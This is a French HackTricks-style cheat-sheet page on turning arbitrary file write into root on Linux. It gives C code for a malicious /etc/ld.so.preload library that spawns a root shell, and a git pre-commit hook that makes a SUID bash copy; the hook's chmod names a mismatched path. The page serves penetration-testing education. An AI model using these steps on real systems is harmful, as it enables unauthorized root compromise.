Arbitrary File Write to Root

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

/etc/ld.so.preload

Ce fichier se comporte comme la variable d'environnement LD_PRELOAD mais fonctionne également dans les binaires SUID. Si vous pouvez le créer ou le modifier, vous pouvez simplement ajouter un chemin vers une bibliothèque qui sera chargée avec chaque binaire exécuté.

Par exemple : echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Crochets Git

Les crochets Git sont des scripts qui sont exécutés lors de divers événements dans un dépôt git, comme lorsqu'un commit est créé, une fusion... Ainsi, si un script ou utilisateur privilégié effectue fréquemment ces actions et qu'il est possible d'écrire dans le dossier .git, cela peut être utilisé pour l'escalade de privilèges.

Par exemple, il est possible de générer un script dans un dépôt git dans le dossier .git/hooks afin qu'il soit toujours exécuté lorsqu'un nouveau commit est créé:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

Fichiers Cron & Time

EN COURS

Fichiers de Service & Socket

EN COURS

binfmt_misc

Le fichier situé dans /proc/sys/fs/binfmt_misc indique quel binaire doit exécuter quel type de fichiers. EN COURS : vérifier les exigences pour exploiter cela afin d'exécuter un shell inversé lorsqu'un type de fichier courant est ouvert.

Dernière mise à jour